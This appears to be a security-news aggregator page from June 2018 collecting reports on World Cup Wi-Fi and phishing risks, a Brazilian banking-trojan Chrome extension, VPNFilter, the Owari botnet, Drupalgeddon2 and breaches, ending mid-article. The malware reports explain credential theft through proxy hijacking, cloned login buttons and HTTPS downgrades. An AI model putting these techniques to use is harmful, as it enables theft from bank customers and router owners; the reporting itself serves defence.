English Articles -

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


FIFA public Wi-Fi guide: which host cities have the most secure networks?
8.6.2018 Kaspersky Security
We all know how easy it is for users to connect to open Wi-Fi networks in public places. Well, it is equally straightforward for criminals to position themselves near poorly protected access points – where they can intercept network traffic and compromise user data.

A lack of essential traffic encryption for Wi-Fi networks where official and global activities are taking place – such as at locations around the forthcoming FIFA World Cup 2018 – offers especially fertile ground for criminals.

With this in mind, can football fans feel digitally safe in host cities? How does the situation with Wi-Fi access differ from town to town? To answer these questions, we have analyzed existing reliable and unreliable access points in 11 FIFA World Cup host cities – Saransk, Samara, Nizhny Novgorod, Kazan, Volgograd, Moscow, Ekaterinburg, Sochi, Rostov, Kaliningrad, and Saint Petersburg.

The main feature of the research is telemetry, which aims to secure users’ Wi-Fi connections and turn on VPNs when needed. Statistics were generated from users who voluntarily agreed to having their data collected. For the research, we only evaluated the security of public Wi-Fi spots. Even with relatively few public Wi-Fi spots in small towns, we still obtained a sufficient base for analysis – almost 32,000 Wi-Fi hotspots. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points.

Security of Wireless Networks in FIFA World Cup host cities
Using the methodology described above, we have evaluated the security of Wi-Fi access points in 11 FIFA World Cup 2018 host cities.

Encryption types used in public Wi-Fi hotspots in FIFA World Cup host cities

Over a fifth (22.4%) of Wi-Fi hotspots in FIFA World Cup 2018 host cities use unreliable networks. This means that criminals simply need to be located near an access point to grab the traffic and get their hands on user data.

Around three quarters of all access points use encryption based on the Wi-Fi Protected Access (WPA/WPA2) protocol family, which is considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. The complicated encryption key can take years to successfully hack.

It should also be noted that even reliable networks, like WPA2, cannot be automatically considered as totally secure. They still give in to brute-force, dictionary, and key reinstallation attacks, of which there are a large number of tutorials and open source tools available online. Any attempt to intercept traffic from WPA Wi-Fi in public access points can also be made by penetrating the gap between the access point and the device at the beginning of the session.

Encryption types used in public Wi-Fi hotspots in FIFA World Cup host cities

The safest city (in terms of public Wi-Fi) turned out to be Saransk, with 72% of access points secured by WPA/WPA2 protocol encryption.

The top-three cities with the highest proportion of unsecured connections are Saint Petersburg (48% of Wi-Fi access points are unsecured), Kaliningrad (47%) and Rostov (44%).

Again, the relativity of the results should be noted. Even a WPA2 connection in a cafe couldn’t be considered as secure, if the password is visible to everyone. Nevertheless, we believe that the methodology used represents the Wi-Fi hot-spot security situation in the host cities, with a fair degree of accuracy.

The results of this research show that the security of Wi-Fi connections in FIFA World Cup hosts cities varies. Therefore. We therefore recommend that users follow some key safety rules.

Recommendations for Users
If you are going to visit any of the FIFA World Cup 2018 host cities and use open Wi-Fi networks while you are there, remember to follow these simple rules to help protect your personal data:

Whenever possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning that criminals won’t be able to read your data, even if they gain access to it. For example, the Kaspersky Secure Connection VPN solution can switch on automatically when a connection is not safe.
Do not trust networks that are not password-protected, or have easy-to-guess or easy-to-find passwords.
Even if a network requests a strong password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection using the same password. This allows them to easily steal personal user data. You should only trust network names and passwords given to you by the employees of an establishment.
To maximize your protection, turn off your Wi-Fi connection whenever you are not using it. This will also save your battery life. We recommend you also disable automatic connections to existing Wi-Fi networks.
If you are not 100% sure that the wireless network you are using is secure, but you still need to connect to the Internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely do not perform any online banking operations or enter your bank card details anywhere. This will avoid situations where your sensitive data or passwords are intercepted and then used for malicious purposes later on.
To avoid becoming a cybercriminal target, you should enable the “Always use a secure connection” (HTTPS) option in your device settings. Enabling this option is recommended when visiting any websites you think may lack the necessary protection.
One example of a dedicated solution is the Secure Connection tool included in the latest versions of Kaspersky Internet Security and Kaspersky Total Security. This module protects users who are connected to Wi-Fi networks by providing them with a secure encrypted connection channel. Secure Connection can be launched manually or, depending on the settings, activated automatically when connecting to public Wi-Fi networks, when navigating to online banking and payment systems or online stores, and when communicating online (via mail services, social networks, etc.).

A MitM extension for Chrome
8.6.2018 Kaspersky
Browser extensions make our lives easier: they hide obtrusive advertising, translate text, help us choose in online stores, etc. There are also less desirable extensions, including those that bombard us with advertising or collect information about our activities. These pale into insignificance, however, when compared to extensions whose main aim is to steal money. To protect our customers, we automatically process large numbers of extensions from a variety of sources. This includes downloading and analyzing suspicious extensions from Chrome Web Store. One extension, in particular, recently caught our attention because it communicated with a suspicious domain.

The Google Chrome extension named Desbloquear Conteúdo (which means ‘Unblock Content’ in Portuguese) targeted users of Brazilian online banking services – all the attempted installations that we traced occurred in Brazil. The aim of this malicious extension is to harvest user logins and passwords and then steal money from their bank accounts. Kaspersky Lab products detect the extension as HEUR:Trojan-Banker.Script.Generic.

Geographic distribution of security product detections of the script fundo.js, one of the extension components

By the time of publication, the malicious extension had already been removed from Chrome Web Store.

The malicious extension in Chrome Web Store

Analysis of malicious extension
Malicious browser extensions often use different techniques (e.g. obfuscation) to prevent detection by security software. The developers of this specific extension, however, didn’t obfuscate its source code, opting instead for a different approach. This piece of malware uses the WebSocket protocol for data communication, making it possible to exchange messages with the C&C server in real time. This means the C&C starts acting as a proxy server to which the extension redirects traffic when the victim visits the site of a Brazilian bank. Essentially, this is a man-in-the-middle attack.

The Desbloquear Conteúdo extension consists of two JS scripts. Let’s take a closer look at them.

The first thing that catches the eye in the script’s code is the function websocket_init(). This is where a WebSocket connection is established. Data is then downloaded from the server (ws://exalpha2018[.]tk:2018) and saved to chrome.storage under the key ‘manualRemovalStorage’.

Download of data from C&C via a WebSocket connection

Data downloaded and saved by the extension

As a result of contacting hxxp://exalpha2018[.]tk/contact-server/?modulo=get, the extension receives the IP address to which user traffic will be redirected.

IP address received from C&C server

The IP to which all user traffic is then redirected

It’s worth mentioning here the Proxy Auto Configuration technology. Modern browsers use a special file written in JavaScript which has just one function: FindProxyForURL. With this function, the browser defines which proxy server to use to establish a connection to various domains.

The fundo.js script uses the Proxy Auto Configuration technology at the time of the function call implement_pac_script. This results in the function FindProxyForURL being replaced with a new one that redirects user traffic to the malicious server, but only when a user visits the web page of a Brazilian bank.

Changing browser settings to redirect user traffic

In this script, the following section of code is the most important:

Execution of the downloaded malicious code on web pages belonging to banks

Just like with fundo.js, data downloaded from the server is saved to manualRemovalStorage. The data includes the domains of several Brazilian banks and the code the browser should execute if a user visits one of the relevant sites.

pages.js downloads the following scripts from the domain ganalytics[.]ga and launches them on the banks’ sites:


Web Antivirus detection statistics for attempts to contact ganalytics[.]ga

All the above scripts have similar functionalities and are designed to steal the user’s credentials. Let’s take a look at one of them.

One of this script’s functions is to add specific HTML code to the main page of the online banking system.

Addition of malicious code to the web page

A closer look at the code that’s returned after contacting the server reveals that it’s needed to collect the one-time passwords used for authentication on the bank’s site.

Interception of users’ one-time passwords

If a user is on the page where logins and passwords are entered, the script creates a clone of the ‘Enter’ button. A function is also created to click this button. The password is stored in the cookie files of this function for subsequent transfer to the C&C and the real button, which is overlaid and hidden from the victim, is then clicked.

Copy of the ‘Enter’ button is created and the login and password for an online banking service are intercepted

As a result, the password to the user’s account is sent to the online banking system as well as to the malicious server.

Sending of all intercepted data to the C&C

Additional analysis of the web resources used in the attack (courtesy of the KL Threat Intelligence Portal) yields some interesting information. In particular, the aforementioned ganalytics[.]ga is registered in the Gabon domain zone, which is why WHOIS services don’t provide much information about it:

WHOIS info for ganalytics[.]ga

However, the IP address where it’s hosted is also associated with several other interesting domains.

A fragment of DNS data from KSN

It’s clear that this IP address is (or was) associated with several other domains with tell-tale names containing the keywords advert, stat, analytic and registered in Brazil’s domain zone. It’s noteworthy that many of them were involved in distributing web miners last autumn, with the mining scripts being downloaded when legitimate Brazilian bank sites were visited.

Fragments of KSN data related to advstatistics.com[.]br

When malware is loaded while the user is visiting a legitimate site, it usually indicates that traffic is being modified locally on the user’s computer. Other things about this case, namely the fact that it targeted Brazilian users and that it used the same IP address that was used in previous attacks, suggest that this browser extension (or related versions of it) earlier had functionality to add cryptocurrency mining scripts to the banking sites users were visiting at the moment the extension was downloaded to their devices.

Browser extensions designed to steal logins and passwords are quite rare. However, they need to be taken seriously given the potential damage they could cause. We recommend that users only install verified extensions with large numbers of installations and reviews in Chrome Web Store or another official service. In spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published in them – we’ve covered one such case. Also, it wouldn’t hurt to have a security product installed on your device that issues a warning whenever an extension acts suspiciously.

2018 Fraud World Cup
8.6.2018 Kaspersky CyberCrime

There are only two weeks to go before the start of the massive soccer event — FIFA World Cup. This championship has already attracted the attention of millions worldwide, including a fair few cybercriminals. Long before kick-off, email accounts began bulging with soccer-related spam, and scammers started exploiting the topic in mailings and creating World Cup-themed phishing pages.

Our statistics show spikes in the number of phishing pages during match ticket sales. Every time tickets went on sale, fraudsters mailed out spam and activated clones of official FIFA pages and sites offering fake giveaways allegedly from partner companies. But as the event draws nearer, cyber scams are reaching fever pitch. We present our observations below.

Fake lottery win notifications
One of the main types of World Cup-related email fraud is spam informing recipients of cash winnings in lotteries supposedly held by official partners and sponsors (Visa, Coca-Cola, Microsoft, etc.), as well as FIFA itself.

Examples of fake lottery win notifications

Such messages contain attachments (usually PDF or DOCX documents) in which the “winner” is congratulated and told to forward detailed contact details (name, date of birth, address, email, telephone no.) in order to receive the prize. Sometimes recipients are asked to pay a part of the postage or bank transfer fees.

Such mailouts are aimed primarily at harvesting user data (including financial), plus picking up a small money transfer. Such messages can also contain malicious attachments, for example, Trojan-Banker programs.

Examples of fake notifications with attached documents

Another type of common spam fraud is an offer to take part in a ticket giveaway or win a trip to a match. Victims are required either to register on a fake promotion page and provide an email address, or, as in the case of lottery emails, to send the “organizers” their contact details. Such messages are sent in the name of FIFA, usually from addresses on recently registered domains. The purpose of such schemes is mainly to update email databases so as to distribute yet more spam.

Examples of messages with ticket and trip giveaways

Advertising spam
In the runup to the championship, we registered a lot of advertising spam with offers for soccer merchandise, transport/accommodation services, and travel packages from various tour operators. Merchandise was generally offered by small online retailers and included toys, souvenirs, and stationery marked with official logos, as well as soccer jerseys for all teams taking part. Some messages even resemble mailings from the official FIFA store.

Examples of messages offering merchandise

There were also spammings unrelated to soccer. For example, traditional spam offering medical products, but using the World Cup to attract attention. Interestingly, the message subject referred to the 2006 World Cup final. Perhaps the spammers used an old template and forgot to change the date.

Wrong year, same product

Ticket sales
Besides online stores selling merchandise, there are plenty of sites offering match tickets, both fake and real. But real doesn’t necessarily mean bona fide: they are often sold by ticket scalpers exploiting various loopholes in the FIFA rules.

Online scalpers selling tickets for an arm and a leg

However, official tickets can only be bought on the official FIFA website, and large fines are imposed for their illegal sale or resale. Those who use the services of speculators risk being turned away at the stadium: tickets are personalized, and if the bearer fails to show ID matching the information in the ticket, FIFA staff have the right to refuse entry.

Fake sites and messages from partners
One of the most popular ways to steal credentials for bank and other accounts is to create counterfeit imitations of official partner websites. Partner organizations quite often arrange ticket giveaways for clients, and this is what attackers exploit to lure users onto fake promotion sites. Such pages look very convincing: well-designed with a working interface, hard to tell from the real thing.

Phishing login page supposedly of a partner bank

Attempt to gain access to an account on a partner company site under the guise of a ticket giveaway

Scammers also try to extract data by mimicking official FIFA notifications. The victim is informed that the security system has been updated and all personal data must be re-entered to avoid lockout. The link in the message takes the victim far away from FIFA to a fake personal account. Naturally, all data entered flows straight to the scammers.

Example of a phishing email seemingly from FIFA

Cybercriminals are particularly keen to target clients of Visa, the tournament’s commercial sponsor, and offer prize giveaways in the name of this international payment heavyweight. To take part, users need to follow a link that unsurprisingly points to a phishing site (the domain was registered a couple of months ago and has nothing to do with the payment system), where they are asked to enter their bank card details, including the CVV/CVC code.

Example of a message and phishing page in the name of Visa

Fraud allsorts
Alongside social engineering, phishers deploy malicious programs in the pursuit of users’ personal data and cash. For example, a fake site offering online broadcasts can plant malware on the victim’s computer under the guise of a Flash Player update required to view the match.

In some cases, phishers have no interest at all in bank accounts and payment details. For instance, under the pretext of receiving a World Cup-themed update for the video game FIFA Soccer, users are prompted to enter their account credentials for the Origin platform on a fake login page. If there are games of interest under the victim’s profile, the cybercriminals change the login/password and link the account to a new email address for subsequent resale.

Fake Origin login page

In late May, a few weeks before the start of the championship, phishing emails offering cheap flights from the major airlines were all the rage. In addition to fake soccer ticket giveaways, there were draws seemingly on behalf of airlines offering free plane tickets.

Fake ticket giveaway in the name of a major airline

Tricks of the trade
To make their sites seem credible, cybercriminals register domain names combining the words “world,” “worldcup,” “FIFA,” “Russia,” etc. (for example: worldcup2018, russia2018, fifarussia). Normally, though not always, such domains look unnatural (for instance, fifa.ucozx.site) and have a non-standard domain extension. So in most cases, a close look at the link in the email or the URL after opening the site should be enough to avoid the bait.

DNS WHOIS data for phishing sites

Likewise with a view to lulling user vigilance, cybercriminals acquire the cheapest SSL certificates available: relevant authorities often fail to verify the existence of the entity acquiring the certificate, meaning that the scammers get the all-important HTTPS in front of their address. To spot a fake, it is enough to look at the domain’s WHOIS data. Scam websites tend to have been registered quite recently and for a short time, and their owners are usually private individuals. What’s more, detailed information about the owner is often hidden.

Besides active domain names, we logged a large number of “sleepers”: on them you might find a placeholder page, if that. Cybercriminals use them as a backup: if one domain is blocked, the site moves to the next.

Examples of backup domain names

The above describes only the most popular scams exploiting the World Cup theme. Nevertheless, it provides a fairly complete picture of how cybercriminals operate and what they want. In addition to the above, we expect shortly to see an explosion of phishing sites offering cheap airline tickets to World Cup host cities, as well as fake mailings supposedly from popular accommodation services with “special offers.”

To avoid being duped, follow these simple rules:

Buy tickets only on the official FIFA website or at official ticket offices.
For online purchases (not only during the tournament), get a separate bank card and set a spending limit.
Do not open links or attachments in emails from unknown senders, even if they seem legitimate.
Check the addresses of links in notifications from known services; at the slightest suspicion, do not click, but open the site manually in the browser.
To preserve your money and nerves, never buy products advertised in spam.
Use the latest security solutions to protect against cyberthreats, and keep the databases up-to-date.

Marcus Hutchins, WannaCry-killer, hit with four new charges by the FBI
8.6.2018 thehackernews  Crime

Marcus Hutchins, the British malware analyst who helped stop global Wannacry menace, is now facing four new charges related to malware he allegedly created and promoted it online to steal financial information.
Hutchins, the 24-year-old better known as MalwareTech, was arrested by the FBI last year as he was headed home to England from the DefCon conference in Las Vegas for his alleged role in creating and distributing Kronos between 2014 and 2015.
Kronos is a Banking Trojan designed to steal banking credentials and personal information from victims' computers, which was sold for $7,000 on Russian online forums, and the FBI accused Hutchins of writing and promoting it online, including via YouTube.

Hutchins pleaded not guilty at a court hearing in August 2017 in Milwaukee and release on $30,000 bail.
However, earlier this week, a revised superseding indictment [PDF] was filed with the Wisconsin Eastern District Court, under which Hutchins faces four new charges along with the six prior counts filed against him by the FBI a month before his arrest.
Marcus Accused of Creating and Selling Another Malware
According to the new indictment, Hutchins created a second piece of malware, known as "UPAS Kit," and also lied to the Federal Bureau of Investigations (FBI) when he was arrested and questioned last year in Las Vegas.
As described by prosecutors, UPAS Kit is Spybot virus that "allowed for the unauthorized exfiltration of information from protected computers" and "used a form grabber and web injects to intercept and collect personal information," including credit card details.
UPAS Kit advertised to "install silently and not alert antivirus engines," for prices ranged above $1,000 back in 2012.
According to the indictment, Hutchins created UPAS Kit in 2012, when he was just 18, and sold it online to another unnamed co-defendant identified as "VinnyK" (aka Aurora123), who was also involved in promoting Kronos.

VinnyK then sold UPAS Kit to another person in Wisconsin in 2012, who allegedly used the malware to attack computers in the United States.
Two other charges relate to Hutchins "aiding and abetting" the distribution of invasive code in an attempt to damage "10 or more protected computers," and helping others to hack computers for financial gain.
Marcus Appealed to his Followers for Donations to Cover Legal Costs
As the news on the revised indictment broke, Hutchins, who has repeatedly denied any illegal activity, called the charges "bullshit" and appealed to his Twitter followers for donations to cover legal costs.
"Spend months and $100k+ fighting this case, then they go and reset the clock by adding even more bullshit charges like 'lying to the FBI,'" Hutchins wrote on his Twitter, calling for donations by adding a quote from Starcraft video game: "We require more minerals."
Hutchins' lawyer Brian Klein called the charges "meritless" and said he expects his client to be cleared of all charges.
"[We] are disappointed the govt has filed this superseding indictment, which is meritless," Klein tweeted. "It only serves to highlight the prosecution's serious flaws. We expect [Hutchins] to be vindicated and then he can return to keeping us all safe from malicious software."
Hutchins, who is living in Los Angeles on bail, is unable to leave the United States since last year due to his pending criminal charges.
Hutchins stormed to fame and hailed as a hero earlier last year when he accidentally stopped a global epidemic of the WannaCry ransomware attack that crippled computers all across the world.

Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit
8.6.2018 thehackernews 

Hundreds of thousands of websites running on the Drupal CMS—including those of major educational institutions and government organizations around the world—have been found vulnerable to a highly critical flaw for which security patches were released almost two months ago.
Security researcher Troy Mursch scanned the whole Internet and found over 115,000 Drupal websites are still vulnerable to the Drupalgeddon2 flaw despite repetitive warnings.

Drupalgeddon2 (CVE-2018-7600) is a highly critical remote code execution vulnerability discovered late March in Drupal CMS software (versions < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1) that could allow attackers to completely take over vulnerable websites.
For those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or standard Drupal installations under the privileges of the user.
Since Drupalgeddon2 had much potential to derive attention of motivated attackers, the company urged all website administrators to install security patches immediately after it was released in late March and decided not to release any technical details of the flaw initially.

However, attackers started exploiting the vulnerability only two weeks after complete details and proof-of-concept (PoC) exploit code of Drupalgeddon2 was published online, which was followed by large-scale Internet scanning and exploitation attempts.

Shortly after that, we saw attackers developed automated exploits leveraging Drupalgeddon 2 vulnerability to inject cryptocurrency miners, backdoors, and other malware into websites, within few hours after it's detailed went public.
Mursch scanned the Internet and found nearly 500,000 websites were running on Drupal 7, out of which 115,070 were still running an outdated version of Drupal vulnerable to Drupalgeddon2.
While analyzing vulnerable websites, Mursch noticed that hundreds of them—including those of Belgium police department, Colorado Attorney General office, Fiat subsidiary Magneti Marelli and food truck locating service—have already been targeted by a new cryptojacking campaign.
Mursch also found some infected websites in the campaign that had already upgraded their sites to the latest Drupal version, but the cryptojacking malware still existed.
We have been warning users since March that if you are already infected with the malware, merely updating your Drupal website would not remove the "backdoors or fix compromised sites." To fully resolve the issue you are recommended to follow this Drupal guide.

IoT Botnets Found Using Default Credentials for C&C Server Databases
8.6.2018 thehackernews  IoT  BotNet

Not following cybersecurity best practices could not only cost online users but also cost cybercriminals. Yes, sometimes hackers don't take best security measures to keep their infrastructure safe.
A variant of IoT botnet, called Owari, that relies on default or weak credentials to hack insecure IoT devices was found itself using default credentials in its MySQL server integrated with command and control (C&C) server, allowing anyone to read/write their database.
Ankit Anubhav, the principal security researcher at IoT security firm NewSky Security, who found the botnets, published a blog post about his findings earlier today, detailing how the botnet authors themselves kept an incredibly week username and password combination for their C&C server's database.

Guess what the credentials could be?
Username: root
Password: root
These login credentials helped Anubhav gain access to the botnet and fetch details about infected devices, the botnet authors who control the botnet and also some of their customers (a.k.a. black box users), who have rented the botnet to launch DDoS attacks.
"Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the botmaster is available) and cooldown time (time interval between the two attack commands) can also be observed," Anubhav wrote.

Besides this, Anubhav was also able to see the duration limit of the attack such as for how long a client can perform the DDoS attack, maximum available bots for an attack, and the list of various IPs targeted by the DDoS attack.
Anubhav also found another botnet, which was also built with a version of Owari and its database was also exposed via weak credentials.
The C&C servers of both the botnets were located at and, which are now offline, as "botnet operators are aware that their IPs will be flagged soon due to the bad network traffic," Anubhav wrote. "Hence to stay under the radar, they often voluntarily change attack IPs."

All New Privacy and Security Features Coming in macOS 10.14 Mojave
8.6.2018 thehackernews  Apple

At Worldwide Developer Conference 2018 on Monday, Apple announced the next version of its macOS operating system, and it's called Mojave.
Besides introducing new features and improvements of macOS 10.14 Mojave—like Dark Mode, Group FaceTime, Dynamic Desktop, and Finder—at WWDC, Apple also revealed a bunch of new security and privacy features coming with the next major macOS update.
Apple CEO Tim Cook said the new features included in Mojave are "inspired by pro users, but designed for everyone," helping you protect from various security threats.
Here's a list of all macOS Mojave security and privacy features:
Safari's Enhanced "Intelligent Tracking Prevention"
It's no longer shocking that your online privacy is being invaded, and everything you search online is being tracked—thanks to third-party trackers present on the Internet in the form of social media like and sharing buttons that marketers and data brokers use to monitor web users as they browse.

But not anymore. With macOS Mojave, Safari has updated its "Intelligent Tracking Prevention"—a feature that limits the tracking ability of website using various ad-tracking and device fingerprinting techniques.
The all-new enhanced Intelligent Tracking Prevention will now automatically block all third-party trackers, including social media "Like" or "Share" buttons, as well as comment widgets from tracking users without their permission.
Safari will also help in defeating the "device fingerprinting" approach by exposing only generic configuration information of users' device and default fonts.
End-to-End Encrypted Group FaceTime (Up to 32 People)

That's really a huge security improvement, as at WWDC 2018, Apple has introduced group FaceTime feature that lets groups of 32 or fewer people do video calls at the same time, which have end-to-end encryption just like the already existing one-to-one audio and video calls and group audio calls.
End-to-encryption for group calls with the Facetime app means that there's no way for Apple or anyone to decrypt the data when it's in transit between devices.
macOS Mojave Will Alert When Your Camera & Mic Are Accessed
As we reported several times in past few years, cybercriminals have now been spreading new malware for macOS that targets built-in webcam and microphone to spy on users without detection.

To address this threat, macOS Mojave adds a new feature that monitors access to your macOS webcam/microphone and alerts you with new permission dialogues whenever an app tries to access the camera or microphone.
This new protection has primarily been designed to prevent malicious software from silently turning on these device features in order to spy on its users.
Excessive Data Access Request User Permissions
macOS Mojave also adds similar permission requirements for apps to access personal data like mail database, message history, file system and backups.
By default, the macOS Mojave will also protect your location information, contacts, photos, Safari data, mail database, message history, iTunes device backups, calendar, reminders, time machine backups, cookies, and more.
Secure (and Convenient) Password Management
We have long warned users to deploy a good password practice by keeping their passwords strong and unique for every website or service. Now, Apple has made it easier in macOS 10.14 Mojave and iOS 12.
While Safari in macOS has provided password suggestions for years when users are asked to create a login at a site, Apple has improved this feature in a way that Safari now automatically generates strong passwords, enters them into the web browser, and stores them in the iCloud keychain when users create new online accounts.
Previously, third-party password manager apps have done that much of tasks, and now Apple is integrating such functionalities directly into the next major versions of both macOS and iOS.

The company also announced a new feature that even flags reused passwords so that users can change them, a new interface that autofills one-time passwords provided by authentication apps, and a mechanism that shares passwords across all of a user's nearby devices, including iOS devices, Macs, and Apple TVs.
macOS Mojave Moves Software Updates from App Store to System Preferences
With the new macOS Mojave, Apple has also redesigned its Mac App Store a little bit and moved the system update mechanism to the System Preferences from the Mac App Store.
Apple has reintroduced "Software Update" option in the System Preferences windows, allowing users to update their operating system and native software without opening the App Store.
Moreover, Apple has also confirmed that Mojave will be its last version of macOS to support legacy 32-bit apps.
Similar High Sierra, users will be shown a dialog box when opening 32-bit apps in macOS 10.14 Mojave (beta1) with a message telling them that "This app will not work with future versions of macOS."

MyHeritage Says Over 92 Million User Accounts Have Been Compromised
8.6.2018 thehackernews Incindent

MyHeritage, the Israel-based DNA testing service designed to investigate family history, has disclosed that the company website was breached last year by unknown attackers, who stole login credentials of its more than 92 million customers.
The company learned about the breach on June 4, 2018, after an unnamed security researcher discovered a database file named "myheritage" on a private server located outside of the company, and shared it with MyHeritage team.

After analyzing the file, the company found that the database, which included the email addresses and hashed passwords of nearly 92.3 million users, are of those customers who signed up for the MyHeritage website before October 27, 2017.
While the MyHeritage security team is still investigating the data breach to identify any potential exploitation of its system, the company confirmed that no other data such as credit card details and family trees, genetic data were ever breached and are stored on a separate system.
"Credit card information is not stored on MyHeritage to begin with, but only on trusted third-party billing providers (e.g., BlueSnap, PayPal) utilized by MyHeritage," MyHeritage wrote in a blog post published today.
"Other types of sensitive data such as family trees and DNA data are stored by MyHeritage on segregated systems, separate from those that store the email addresses, and they include added layers of security. We have no reason to believe those systems have been compromised."
MyHeritage also confirmed that there was no evidence of account compromise.

The company also notes that it does not store its customer passwords in plaintext; instead, the affected website uses a hashing algorithm with a unique salt to protect users' passwords, making them more resilient to cracking.
Therefore, your stolen passwords are probably safe, but the company still advised all of its users to change their passwords and keep a stronger and unique one, just to be on the safer side.
MyHeritage said it had hired an independent cybersecurity firm to conduct a forensic investigation of the data breach. The company also said it is adding two-factor authentication feature as an option for users.

Destructive and MiTM Capabilities of VPNFilter Malware Revealed
8.6.2018 thehackernews 

It turns out that the threat of the massive VPNFilter botnet malware that was discovered late last month is beyond what we initially thought.
Security researchers from Cisco's Talos cyber intelligence have today uncovered more details about VPNFilter malware, an advanced piece of IoT botnet malware that infected more than 500,000 routers in at least 54 countries, allowing attackers to spy on users, as well as conduct destructive cyber operations.
Initially, it was believed that the malware targets routers and network-attached storage from Linksys, MikroTik, NETGEAR, and TP-Link, but a more in-depth analysis conducted by researchers reveals that the VPNFilter also hacks devices manufactured by ASUS, D-Link, Huawei, Ubiquiti, QNAP, UPVEL, and ZTE.

"First, we have determined that are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are. New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Lin," the researchers say.
To hijack devices manufactured by above listed affected vendors, the malware simply relies on publicly-known vulnerabilities or use default credentials, instead of exploiting zero-day vulnerabilities.
VPNFilter 'ssler' — Man-in-the-Middle Attack Module

Besides this, the researchers primarily shared technical details on a new stage 3 module, named "ssler," which is an advanced network packet sniffer that, if installed, allows hackers to intercept network traffic passing through an infected router and deliver malicious payloads using man-in-the-middle attacks.
"Ssler module provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80," the researchers say.
This 3rd-stage module also makes the malware capable of maintaining a persistent presence on an infected device, even after a reboot.
The ssler module has been designed to deliver custom malicious payloads for specific devices connected to the infected network using a parameter list, which defines the module's behavior and which websites should be targeted.
These parameters include settings to define the location of a folder on the device where stolen data should be stored, the source and destination IP address for creating iptable rules, as well as the targeted URL of the JavaScript injection.

To setup packet sniffing for all outgoing web requests on port 80, the module configures the device's iptables immediately after its installation to redirect all network traffic destined for port 80 to its local service listening on port 8888.
"To ensure that these rules do not get removed, ssler deletes them and then adds them back approximately every four minutes," the researchers explain.
To target HTTPS requests, the ssler module also performs SSLStrip attack, i.e., it downgrades HTTPS connections to HTTP, forcing victim web browsers into communicating over plaintext HTTP.
VPNFilter 'dstr' — Device Destruction Module
As briefed in our previous article, VPNFilter also has a destructive capability (dstr module) that can be used to render an infected device unusable by deleting files necessary for normal device operation.
The malware triggers a killswitch for routers, where it first deliberately kills itself, before deleting the rest of the files on the system [named vpnfilter, security, and tor], possibly in an attempt to hide its presence during the forensic analysis.
This capability can be triggered on individual victim machines or en masse, potentially cutting off internet access for hundreds of thousands of victims worldwide.
Simply Rebooting Your Router is Not Enough
Despite the FBI seizure of a key command and control server right after the discovery of VPNFilter, the botnet still remains active, due to its versatile, multi-stage design.
Stage 1 of the malware can survive a reboot, gaining a persistent foothold on the infected device and enabling the deployment of stages 2 and 3 malware. So, each time an infected device is restarted, stages 2 and 3 are re-installed on the device.

This means, even after the FBI seized the key C&C server of VPNFilter, hundreds of thousands of devices already infected with the malware, likely remain infected with stage 1, which later installs stages 2 and 3.
Therefore, rebooting alone is not enough to completely remove the VPNFilter malware from infected devices, and owners of consumer-grade routers, switches, and network-attached storage devices need to take additional measures, which vary from model to model. For this, router owners are advised to contact their manufacturer.
For some devices, resetting routers to factory default could remove the potentially destructive malware, along with removing stage 1, while some devices can be cleaned up with a simple reboot, followed by updating the device firmware.
And as I said earlier, mark these words again: if your router cannot be updated, throw it away and buy a new one. Your security and privacy is more than worth a router's price.

Update Google Chrome Immediately to Patch a High Severity Vulnerability
8.6.2018 thehackernews 

You must update your Google Chrome now.
Security researcher Micha³ Bentkowski discovered and reported a high severity vulnerability in Google Chrome in late May, affecting the web browsing software for all major operating systems including Windows, Mac, and Linux.
Without revealing any technical detail about the vulnerability, the Chrome security team described the issue as incorrect handling of CSP header (CVE-2018-6148) in a blog post published today.
"Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed," the Chrome security team notes.
Content Security Policy (CSP) header allows website administrators to add an extra layer of security on a given web page by allowing them to control resources the browser is allowed to load.

Mishandling of CSP headers by your web browser could re-enable attackers to perform cross-site scripting, clickjacking and other types of code injection attacks on any targeted web pages.
The patch for the vulnerability has already been rolled out to its users in a stable Chrome update 67.0.3396.79 for Windows, Mac, and Linux operating system, which users may have already receive or will receive over the coming days/weeks.
So, make sure your system is running the updated version of Chrome web browser. We'll update the article, as soon as Google releases further update.
Firefox has also released its new version of the Firefox web browser, version 60.0.2, which includes security and bug fixes. So, users of the stable version of Firefox are also recommended to update their browser.

Prowli Malware Targeting Servers, Routers, and IoT Devices
8.6.2018 thehackernews  IoT 

After the discovery of massive VPNFilter malware botnet, security researchers have now uncovered another giant botnet that has already compromised more than 40,000 servers, modems and internet-connected devices belonging to a wide number of organizations across the world.
Dubbed Operation Prowli, the campaign has been spreading malware and injecting malicious code to take over servers and websites around the world using various attack techniques including use of exploits, password brute-forcing and abusing weak configurations.
Discovered by researchers at the GuardiCore security team, Operation Prowli has already hit more than 40,000 victim machines from over 9,000 businesses in various domains, including finance, education and government organisations.

Here's the list devices and services infected by the Prowli malware:
Drupal and WordPress CMS servers hosting popular websites
Joomla! servers running the K2 extension
Backup servers running HP Data Protector software
DSL modems
Servers with an open SSH port
PhpMyAdmin installations
NFS boxes
Servers with exposed SMB ports
Vulnerable Internet-of-Thing (IoT) devices
All the above targets were infected using either a known vulnerability or credential guessing.
Prowli Malware Injects Cryptocurrency Miner

